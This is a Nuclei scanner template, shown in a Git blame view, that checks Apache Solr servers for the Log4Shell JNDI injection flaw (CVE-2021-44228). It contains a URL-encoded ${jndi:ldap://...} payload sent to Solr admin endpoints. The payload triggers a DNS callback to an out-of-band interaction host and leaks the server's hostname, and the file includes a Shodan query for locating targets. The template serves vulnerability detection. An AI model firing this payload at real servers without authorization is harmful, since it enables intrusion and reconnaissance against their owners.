nuclei-templates/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml

76 lines
2.5 KiB
YAML
Raw Permalink Normal View History

id: apache-solr-log4j-rce
info:
name: Apache Solr 7+ - Remote Code Execution (Apache Log4j)
2023-04-18 20:34:32 +00:00
author: Evan Rubinstein,nvn1729,j4vaovo
severity: critical
2022-05-31 08:43:47 +00:00
description: |
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
reference:
2021-12-15 15:50:18 +00:00
- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
- https://twitter.com/sirifu4k1/status/1470011568834424837
- https://github.com/apache/solr/pull/454
2022-07-16 17:08:06 +00:00
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
2023-04-18 20:39:06 +00:00
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
2022-07-18 06:34:43 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
2023-04-19 20:43:36 +00:00
shodan-query: http.html:"Apache Solr"
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
2023-05-03 17:51:44 +00:00
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
2023-04-18 20:34:32 +00:00
- raw:
- |
@timeout: 25s
2024-01-27 14:15:15 +00:00
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
2023-04-18 20:34:32 +00:00
Host: {{Hostname}}
2023-04-19 20:43:36 +00:00
payloads:
endpoint:
- "collections"
- "cores"
2023-07-16 13:32:52 +00:00
attack: clusterbomb
matchers-condition: and
matchers:
2023-01-11 06:34:21 +00:00
- type: word
part: body
words:
2023-04-18 20:34:32 +00:00
- 'org.apache.solr'
2023-01-11 06:34:21 +00:00
- type: word
2023-11-17 08:48:58 +00:00
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
2023-11-17 08:48:58 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
2023-04-18 21:18:33 +00:00
extractors:
2023-05-03 18:21:23 +00:00
- type: kval
kval:
2023-11-17 08:48:58 +00:00
- interactsh_ip
2023-05-03 18:21:23 +00:00
- type: regex
2023-11-17 08:48:58 +00:00
part: interactsh_request
2023-05-03 18:21:23 +00:00
group: 2
regex:
2023-11-17 08:48:58 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
2023-05-03 18:21:23 +00:00
2023-04-18 21:18:33 +00:00
- type: regex
2023-11-17 08:48:58 +00:00
part: interactsh_request
2023-05-03 17:51:44 +00:00
group: 1
2023-04-18 21:18:33 +00:00
regex:
2023-11-17 08:48:58 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
# digest: 4a0a00473045022060b0ff4627227932af965189042812bb6d42700a4d165a21af14defa05130797022100de39eba08fa9e66b3372fa708d8ce09109381c7269607247ce7b145789c09d7a:922c64590222798bb761d5b6d8e72950